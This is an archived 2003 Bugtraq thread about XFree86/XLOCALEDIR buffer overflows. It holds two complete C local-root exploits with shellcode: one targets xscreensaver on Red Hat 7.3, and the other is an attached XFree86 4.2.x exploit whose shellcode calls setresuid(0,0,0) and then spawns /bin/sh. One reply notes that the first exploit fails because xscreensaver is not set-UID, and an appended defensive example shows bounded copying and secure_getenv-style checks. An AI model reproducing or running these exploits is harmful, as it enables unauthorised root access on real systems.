92958 2003-03-06 21:41 /52 lines/ Angelo Rosiello <guilecool@usa.com>
Imported: 2003-03-06 21:41 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3863>
Subject: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
I think you don't need other comments:

/*
**
** Tested on rh 7.3 using XFree86
** xscreensaver vulnerability
** AUTHORS: Angelo Rosiello (Guilecool) & deka
** REQUIRES: X must be run!
** EFFECTS: local root exploit!
**
** deka is leet brother, thank you :>
** MAIL: guilecool@usa.com
**
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0xbfffdf20 // change it if u need

char shellcode[] =
    "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
    "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
    "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
    "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
    "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
    "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
    "\xc0\x40\xcd\x80";

int main()
{
    char buf[4076];
    unsigned long retaddr = RETADDR;

    memset(buf, 0x0, 4076);
    memset(buf, 0x41, 4072);
    memcpy(buf+2076, &retaddr, 0x4);
    setenv("XLOCALEDIR", buf, 1);

    memset(buf, 0x90, 4072);
    memcpy((buf+4072-strlen(shellcode)), shellcode, strlen(shellcode));
    setenv("HAXHAX", buf, 1);

    execl("/usr/X11R6/bin/xscreensaver", "xscreensaver", 0);
}
(92958) /Angelo Rosiello <guilecool@usa.com>/-------

93130 2003-03-07 18:36 /27 lines/ Steven Leikeim <steven@enel.ucalgary.ca>
Imported: 2003-03-07 18:36 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3874>
Comment on text 92958 by Angelo Rosiello <guilecool@usa.com>
Subject: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
On Thu, Mar 06, 2003 at 06:26:41PM -0000, Angelo Rosiello wrote:
>
> I think you don't need other comments:
>
> /*
> **
> ** Tested on rh 7.3 using XFree86
> ** xscreensaver vulnerability
> ** AUTHORS: Angelo Rosiello (Guilecool) & deka
> ** REQUIRES: X must be run!
> ** EFFECTS: local root exploit!
> **

Oddly enough, this does NOT work on my RedHat 7.3 installation. I have the
default xscreensaver RPM installed (xscreensaver-3.33-4). When I run this,
xscreensaver DOES dump core; however, xscreensaver is not suid root and so
will not itself give a root exploit. Perhaps there is an expected
interaction with the X server (which is running as root), but this is not
clear from Angelo's message.

Steven Leikeim
Department of Electrical and Computer Engineering
University of Calgary
(93130) /Steven Leikeim <steven@enel.ucalgary.ca>/

93143 2003-03-07 22:42 /16 lines/ Inode <inode@mediaservice.net>
Imported: 2003-03-07 22:42 by Brevbäraren
External recipient: Angelo Rosiello <guilecool@usa.com>
Recipient: Bugtraq (import) <3884>
Subject: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
Hi all,

exploit attached. Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+
| Agazzini Maurizio                          Tel: +39-011-32.72.100 |
| Security Analyst                           Fax: +39-011-32.46.497 |
| @ Mediaservice.net S.R.L.           D.S.D. Data Security Division |
|                                                                   |
| PGP Key : http://www.wayreth.eu.org/Inode.asc                     |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |
+-------------------------------------------------------------------+
(93143) /Inode <inode@mediaservice.net>/------------
Attachment (text/plain) in text 93144

93144 2003-03-07 22:42 /73 lines/ Inode <inode@mediaservice.net>
Attachment filename: "xfree_4.2_exploit.c"
Imported: 2003-03-07 22:42 by Brevbäraren
External recipient: Angelo Rosiello <guilecool@usa.com>
Recipient: Bugtraq (import) <3885>
Attachment (text/plain) to text 93143
Subject: Attachment (xfree_4.2_exploit.c) to: Re: xscreensaver exploit for Redhat 7.3
------------------------------------------------------------
/* Original exploit:
** oC-localX.c - XFree86 Version 4.2.x local root exploit
** By dcryptr && tarranta / oC

This exploit is a modified version of the original oC-localX.c
built to work without any offset.

Some distros have the file:
/usr/X11R6/bin/dga +s
This program isn't exploitable because it drops privileges before
running the Xlib function vulnerable to this overflow.

This exploit works on linux x86 on all distros.

Tested on:
- Slackware 8.1 ( xlock, xscreensaver, xterm )
- Redhat 7.3 ( manual +s to xlock )
- Suse 8.1 ( manual +s to xlock )

by Inode <inode@mediaservice.net>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char shellcode[] =
    /* setresuid(0,0,0); */
    "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
    /* /bin/sh execve(); */
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
    /* exit(0); */
    "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

#define ALIGN 0

int main(int argc, char **argv)
{
    char buffer[6000];
    int i;
    int ret;
    char *env[3] = {buffer, shellcode, NULL};
    int *ap;

    strcpy(buffer, "XLOCALEDIR=");

    printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n");

    if( argc != 3 ) {
        printf(" Usage: %s <full path> <name>\n", argv[0]);
        printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n", argv[0]);
        return 1;
    }

    ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

    ap = (int *)( buffer + ALIGN + strlen(buffer) );
    for (i = 0; i < sizeof(buffer); i += 4)
        *ap++ = ret;

    execle(argv[1], argv[2], NULL, env);
    return(0);
}
(93144) /Inode <inode@mediaservice.net>/------------
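The thread turns on two defensive observations: Steven Leikeim's, that xscreensaver on Red Hat 7.3 is not set-UID and so a crash there gains nothing, and the attachment's, that dga is unexploitable because it drops privileges before reaching the vulnerable Xlib code. The following added example (not code from the thread, from XFree86 or from any of its authors) illustrates the bug class, an environment variable copied into a fixed stack buffer, next to the two mitigations a privileged program should carry: a length-checked copy that rejects truncation, and ignoring caller-supplied path variables entirely while set-UID, in the manner of glibc's secure_getenv(). The names trusted_env, locale_alias_path, self_check, the LOCALE_PATH_MAX limit and the locale.alias file name are assumptions made for the example.

```c
/* Added example, not XFree86's code: the bug class behind the exploits
 * above (an environment variable such as XLOCALEDIR strcpy()'d into a
 * fixed stack buffer) beside two mitigations: a length-checked copy and
 * ignoring path variables entirely while set-UID, the property that made
 * dga unexploitable according to the attachment's comments. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define LOCALE_PATH_MAX 256   /* constructed limit for the illustration */

/* Value of an environment variable, or NULL while set-UID/set-GID, modelled
 * on glibc's secure_getenv(): a privileged program must not let its caller
 * choose search paths. */
const char *trusted_env(const char *name)
{
    if (getuid() != geteuid() || getgid() != getegid())
        return NULL;
    return getenv(name);
}

/* Build "<dir>/locale.alias" (file name assumed for the example) into out
 * with an explicit bound: 0 on success, -1 if unset, untrusted or too long.
 * A truncated path is rejected, not used. */
int locale_alias_path(const char *var, char *out, size_t outsz)
{
    const char *dir = trusted_env(var);
    if (dir == NULL || *dir == '\0')
        return -1;
    int n = snprintf(out, outsz, "%s/locale.alias", dir);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Exercise three constructed cases; returns how many behaved as intended. */
int self_check(void)
{
    char path[LOCALE_PATH_MAX], big[2 * LOCALE_PATH_MAX];
    int ok = 0;
    setenv("XLOCALEDIR", "/usr/X11R6/lib/X11/locale", 1);     /* sane value */
    ok += locale_alias_path("XLOCALEDIR", path, sizeof path) == 0
          && strcmp(path, "/usr/X11R6/lib/X11/locale/locale.alias") == 0;
    memset(big, 'A', sizeof big - 1);        /* overlong, like the exploits' filler */
    big[sizeof big - 1] = '\0';
    setenv("XLOCALEDIR", big, 1);
    ok += locale_alias_path("XLOCALEDIR", path, sizeof path) == -1;
    unsetenv("XLOCALEDIR");
    ok += locale_alias_path("XLOCALEDIR", path, sizeof path) == -1;
    return ok;
}
```

Run unprivileged, trusted_env() passes values through and the length check alone does the work; installed set-UID, it returns NULL and the variable is never consulted, which is the behaviour that kept dga out of reach.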